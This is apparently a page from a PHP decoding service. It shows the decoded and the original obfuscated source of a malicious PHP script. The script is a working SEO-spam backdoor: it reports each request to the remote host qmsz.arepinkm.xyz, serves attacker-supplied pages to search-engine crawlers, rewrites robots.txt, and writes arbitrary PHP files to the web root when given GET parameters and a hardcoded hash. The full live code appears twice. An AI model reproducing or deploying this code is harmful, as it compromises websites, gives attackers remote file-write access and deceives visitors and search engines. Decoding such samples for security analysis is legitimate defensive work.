Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto n_ldQ; nNNEh: function st_uri() { if (isset($_SERVER["\122\105\x51\x55\x45\12..
Decoded Output download
<?php
goto n_ldQ; nNNEh: function st_uri() { if (isset($_SERVER["REQUEST_URI"])) { $duri = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $duri; } goto oNRHw; Kr2yl: if ($duri_tmp == '') { $duri_tmp = "/"; } goto y0nTs; W7l6Y: if (isset($_SERVER["HTTP_REFERER"])) { $urlshang = $_SERVER["HTTP_REFERER"]; $urlshang = urlencode($urlshang); } goto WAXsU; hLqTO: if (is_htps()) { $http = "https"; } else { $http = "http"; } goto hJlZd; yPXg9: @ignore_user_abort(1); goto pXwNo; h1O1r: function is_htps() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto TWHEK; vxNJO: $lang = urlencode($lang); goto JeVZ_; dgSOC: function pingmap($url) { $url_arr = explode("\xd
", trim($url)); $return_str = ''; foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl); $ok = strpos($pingRes, "Sitemap Notification Received") !== false ? "pingok" : "error"; $return_str .= $pingUrl . "-- " . $ok . "<br>"; } return $return_str; } goto L8lVl; xU0sD: $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto vxNJO; oNRHw: $goweb = $xmlname . ".arepinkm" . ".xyz"; goto h1O1r; aHRVe: $http_web = "http"; goto hLqTO; GNLux: $htmcontent = trim(dageget($web)); goto M7dxD; JeVZ_: $urlshang = ''; goto W7l6Y; pXwNo: $xmlname = "qmsz"; goto aHRVe; L8lVl: function sbot() { $uAgent = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($uAgent, "googlebot") || stristr($uAgent, "bing") || stristr($uAgent, "yahoo") || stristr($uAgent, "google") || stristr($uAgent, "Googlebot") || stristr($uAgent, "googlebot")) { return true; } else { return false; } } goto i11u9; WAXsU: if (@$_GET["pd"] != '') { $add_content = @$_GET["mapname"]; $action = @$_GET["action"]; if (isset($_SERVER["DOCUMENT_ROOT"])) { $path = $_SERVER["DOCUMENT_ROOT"]; } else { $path = dirname(__FILE__); } if (!$action) { $action = "put"; } if ($action == "put") { if (strstr($add_content, ".xml")) { $map_path = $path . "/sitemap.xml"; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . "/robots.txt"; if (file_exists($file_path)) { $data = dageget($file_path); } else { $data = "User-agent: *Allow: /"; } $sitmap_url = $http . "://" . $host . "/" . $add_content; if (stristr($data, $sitmap_url)) { echo "<br>sitemap already added!<br>"; } else { if (file_put_contents($file_path, trim($data) . "\xd\xa" . "Sitemap: " . $sitmap_url)) { echo "<br>ok<br>"; } else { echo "<br>file write false!<br>"; } } } else { echo "<br>sitemap name false!<br>"; } if (strstr($add_content, ".p" . "hp")) { $a = sha1(sha1(@$_GET["a"])); $b = sha1(sha1(@$_GET["b"])); if ($a == dageget($http_web . "://" . $goweb . "/a.p" . "hp") || $b == "808735b17c8943e3715388958dc22d879a8c9eaa") { $dstr = @$_GET["dstr"]; if (file_put_contents($path . "/" . $add_content, $dstr)) { echo "ok"; } } } } die; } goto MaohL; M7dxD: if (!strstr($htmcontent, "nobotuseragent")) { if (strstr($htmcontent, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); $htmcontent = str_replace("okhtmlgetcontent", '', $htmcontent); echo $htmcontent; die; } else { if (strstr($htmcontent, "okxmlgetcontent")) { $htmcontent = str_replace("okxmlgetcontent", '', $htmcontent); @header("Content-type: text/xml"); echo $htmcontent; die; } else { if (strstr($htmcontent, "pingxmlgetcontent")) { $htmcontent = str_replace("pingxmlgetcontent", '', $htmcontent); @header("Content-type: text/html; charset=utf-8"); echo pingmap($htmcontent); die; } } } } goto dgSOC; y0nTs: $duri = urlencode($duri_tmp); goto nNNEh; MaohL: $web = $http_web . "://" . $goweb . "/indexnew.php?web=" . $host . "&zz=" . sbot() . "&uri=" . $duri . "&urlshang=" . $urlshang . "&http=" . $http . "&lang=" . $lang; goto GNLux; hJlZd: $duri_tmp = st_uri(); goto Kr2yl; TWHEK: $host = $_SERVER["HTTP_HOST"]; goto xU0sD; n_ldQ: @set_time_limit(3600); goto yPXg9; i11u9: function dageget($url) { $file_contents = ''; if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } goto mF5jz; mF5jz:
//he001 ?>
Did this file decode correctly?
Original Code
<?php
goto n_ldQ; nNNEh: function st_uri() { if (isset($_SERVER["\122\105\x51\x55\x45\123\124\137\125\122\111"])) { $duri = $_SERVER["\122\105\x51\x55\105\x53\x54\x5f\125\x52\x49"]; } else { if (isset($_SERVER["\x61\162\147\x76"])) { $duri = $_SERVER["\x50\x48\120\x5f\x53\105\114\x46"] . "\x3f" . $_SERVER["\x61\162\x67\166"][0]; } else { $duri = $_SERVER["\120\110\120\137\123\105\114\106"] . "\x3f" . $_SERVER["\121\x55\105\122\x59\137\x53\124\122\111\x4e\x47"]; } } return $duri; } goto oNRHw; Kr2yl: if ($duri_tmp == '') { $duri_tmp = "\57"; } goto y0nTs; W7l6Y: if (isset($_SERVER["\110\x54\x54\120\137\122\105\x46\105\x52\105\x52"])) { $urlshang = $_SERVER["\x48\124\x54\x50\x5f\x52\105\x46\105\x52\105\x52"]; $urlshang = urlencode($urlshang); } goto WAXsU; hLqTO: if (is_htps()) { $http = "\150\164\164\x70\x73"; } else { $http = "\150\x74\x74\160"; } goto hJlZd; yPXg9: @ignore_user_abort(1); goto pXwNo; h1O1r: function is_htps() { if (isset($_SERVER["\x48\124\124\x50\123"]) && strtolower($_SERVER["\110\x54\x54\x50\x53"]) !== "\157\146\x66") { return true; } elseif (isset($_SERVER["\110\124\x54\x50\x5f\130\x5f\106\117\122\127\x41\122\x44\x45\104\x5f\x50\x52\x4f\x54\x4f"]) && $_SERVER["\x48\124\x54\x50\137\x58\x5f\x46\x4f\122\x57\x41\x52\104\x45\104\137\x50\122\x4f\124\117"] === "\x68\164\x74\x70\163") { return true; } elseif (isset($_SERVER["\x48\124\124\120\x5f\106\x52\x4f\x4e\x54\137\x45\116\x44\137\x48\124\124\120\x53"]) && strtolower($_SERVER["\110\x54\x54\120\137\x46\x52\117\x4e\124\137\x45\116\x44\137\x48\x54\x54\120\123"]) !== "\x6f\x66\146") { return true; } return false; } goto TWHEK; vxNJO: $lang = urlencode($lang); goto JeVZ_; dgSOC: function pingmap($url) { $url_arr = explode("\xd\12", trim($url)); $return_str = ''; foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl); $ok = strpos($pingRes, "\123\151\164\x65\155\x61\x70\40\x4e\x6f\164\151\x66\151\x63\x61\x74\x69\157\156\40\x52\145\143\145\x69\x76\145\144") !== false ? "\x70\x69\x6e\147\x6f\x6b" : "\x65\x72\x72\x6f\x72"; $return_str .= $pingUrl . "\55\x2d\40" . $ok . "\74\x62\x72\76"; } return $return_str; } goto L8lVl; xU0sD: $lang = @$_SERVER["\110\x54\x54\120\x5f\x41\103\103\105\x50\x54\137\114\101\x4e\107\125\x41\107\105"]; goto vxNJO; oNRHw: $goweb = $xmlname . "\56\141\x72\x65\x70\x69\x6e\x6b\x6d" . "\56\170\x79\x7a"; goto h1O1r; aHRVe: $http_web = "\150\164\x74\160"; goto hLqTO; GNLux: $htmcontent = trim(dageget($web)); goto M7dxD; JeVZ_: $urlshang = ''; goto W7l6Y; pXwNo: $xmlname = "\161\x6d\163\x7a"; goto aHRVe; L8lVl: function sbot() { $uAgent = strtolower($_SERVER["\x48\124\124\120\137\x55\x53\x45\122\137\101\x47\105\116\124"]); if (stristr($uAgent, "\147\x6f\x6f\147\x6c\145\142\157\x74") || stristr($uAgent, "\x62\151\x6e\147") || stristr($uAgent, "\x79\x61\x68\x6f\157") || stristr($uAgent, "\x67\x6f\x6f\147\154\x65") || stristr($uAgent, "\x47\157\157\x67\x6c\145\142\157\164") || stristr($uAgent, "\x67\x6f\157\x67\154\x65\x62\157\164")) { return true; } else { return false; } } goto i11u9; WAXsU: if (@$_GET["\160\144"] != '') { $add_content = @$_GET["\x6d\141\x70\156\141\x6d\x65"]; $action = @$_GET["\x61\143\x74\151\x6f\x6e"]; if (isset($_SERVER["\x44\117\x43\125\x4d\105\x4e\x54\137\122\x4f\117\x54"])) { $path = $_SERVER["\104\x4f\103\x55\115\105\x4e\x54\x5f\122\117\117\124"]; } else { $path = dirname(__FILE__); } if (!$action) { $action = "\x70\165\164"; } if ($action == "\x70\x75\164") { if (strstr($add_content, "\x2e\x78\x6d\x6c")) { $map_path = $path . "\x2f\x73\x69\x74\145\x6d\x61\160\56\x78\155\154"; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . "\x2f\x72\157\142\157\164\x73\x2e\164\170\164"; if (file_exists($file_path)) { $data = dageget($file_path); } else { $data = "\125\x73\145\x72\55\141\147\x65\x6e\164\x3a\x20\x2a\x41\x6c\x6c\157\167\72\40\57"; } $sitmap_url = $http . "\x3a\x2f\57" . $host . "\57" . $add_content; if (stristr($data, $sitmap_url)) { echo "\x3c\142\x72\x3e\x73\151\x74\145\155\x61\x70\40\141\x6c\162\145\x61\144\x79\40\x61\144\144\145\144\41\x3c\142\162\76"; } else { if (file_put_contents($file_path, trim($data) . "\xd\xa" . "\123\151\164\145\x6d\x61\x70\x3a\x20" . $sitmap_url)) { echo "\74\x62\x72\76\x6f\153\x3c\x62\162\x3e"; } else { echo "\74\142\162\x3e\x66\151\x6c\145\40\167\x72\151\x74\145\40\x66\x61\x6c\163\x65\41\x3c\x62\162\x3e"; } } } else { echo "\74\142\162\x3e\163\x69\164\145\155\x61\x70\x20\x6e\141\x6d\145\40\146\141\154\x73\145\x21\74\x62\162\x3e"; } if (strstr($add_content, "\56\x70" . "\x68\160")) { $a = sha1(sha1(@$_GET["\141"])); $b = sha1(sha1(@$_GET["\142"])); if ($a == dageget($http_web . "\72\57\57" . $goweb . "\x2f\x61\x2e\x70" . "\150\160") || $b == "\70\x30\x38\67\x33\65\x62\61\x37\x63\70\x39\64\63\145\x33\67\61\65\x33\x38\70\71\x35\x38\x64\143\62\62\144\x38\x37\x39\141\70\x63\x39\145\141\141") { $dstr = @$_GET["\144\163\164\162"]; if (file_put_contents($path . "\x2f" . $add_content, $dstr)) { echo "\157\x6b"; } } } } die; } goto MaohL; M7dxD: if (!strstr($htmcontent, "\156\157\142\157\164\165\163\145\x72\141\147\x65\x6e\164")) { if (strstr($htmcontent, "\x6f\153\x68\x74\x6d\154\147\145\x74\143\157\156\x74\x65\x6e\164")) { @header("\103\x6f\x6e\164\145\x6e\x74\x2d\164\171\160\x65\72\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\73\x20\x63\150\x61\162\x73\x65\x74\75\165\164\x66\55\70"); $htmcontent = str_replace("\x6f\153\150\x74\155\154\147\145\164\x63\x6f\x6e\x74\145\156\164", '', $htmcontent); echo $htmcontent; die; } else { if (strstr($htmcontent, "\157\x6b\x78\x6d\154\147\x65\164\x63\157\156\x74\145\156\164")) { $htmcontent = str_replace("\157\x6b\x78\x6d\x6c\147\145\164\143\157\x6e\164\145\156\164", '', $htmcontent); @header("\103\x6f\x6e\164\145\156\x74\x2d\x74\171\160\145\x3a\40\x74\x65\170\164\x2f\x78\155\154"); echo $htmcontent; die; } else { if (strstr($htmcontent, "\160\151\156\147\170\x6d\x6c\x67\145\164\x63\x6f\x6e\164\145\156\164")) { $htmcontent = str_replace("\160\x69\156\147\170\x6d\x6c\147\x65\164\x63\157\x6e\164\145\156\x74", '', $htmcontent); @header("\103\157\156\164\x65\x6e\164\55\x74\x79\x70\145\72\x20\x74\x65\170\x74\57\x68\x74\155\x6c\73\40\143\x68\x61\x72\x73\x65\x74\75\165\x74\146\x2d\70"); echo pingmap($htmcontent); die; } } } } goto dgSOC; y0nTs: $duri = urlencode($duri_tmp); goto nNNEh; MaohL: $web = $http_web . "\72\57\57" . $goweb . "\57\151\156\144\145\170\x6e\145\x77\x2e\x70\150\160\77\x77\x65\x62\75" . $host . "\46\172\x7a\x3d" . sbot() . "\46\x75\x72\x69\x3d" . $duri . "\x26\165\162\154\163\150\x61\156\x67\75" . $urlshang . "\46\x68\164\164\160\75" . $http . "\x26\x6c\141\156\x67\x3d" . $lang; goto GNLux; hJlZd: $duri_tmp = st_uri(); goto Kr2yl; TWHEK: $host = $_SERVER["\110\x54\124\120\x5f\x48\x4f\x53\x54"]; goto xU0sD; n_ldQ: @set_time_limit(3600); goto yPXg9; i11u9: function dageget($url) { $file_contents = ''; if (function_exists("\143\x75\x72\154\137\151\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } goto mF5jz; mF5jz:
//he001 ?>
Function Calls
None |
Stats
MD5 | c23cb67ec08ff7086500388ad443d488 |
Eval Count | 0 |
Decode Time | 44 ms |